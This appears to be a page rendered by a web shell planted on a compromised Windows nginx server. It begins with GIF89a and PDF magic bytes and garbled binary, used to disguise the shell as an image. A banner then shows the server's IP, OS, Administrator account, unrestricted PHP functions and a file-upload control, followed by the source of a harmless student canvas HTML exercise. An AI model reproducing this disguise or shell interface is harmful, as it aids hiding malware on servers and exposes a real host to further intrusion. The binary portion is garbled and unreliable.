GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1022/Resources/Week/17/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <title>canvas1</title> <meta charset="utf-8"> <link href="canvas1.css" rel="stylesheet"> <script src="debug.js"></script> <script src="canvas1.js"></script> </head> <body> <h1>canvas1</h1> <h2>cssCanvas</h2> <canvas id="cssCanvas"> Your browser does not support the canvas element. </canvas> <h2>imgCanvas</h2> <canvas id="imgCanvas" width="250" height="125"> Your browser does not support the canvas element. </canvas> <script> _Initialize(); </script> </body> </html>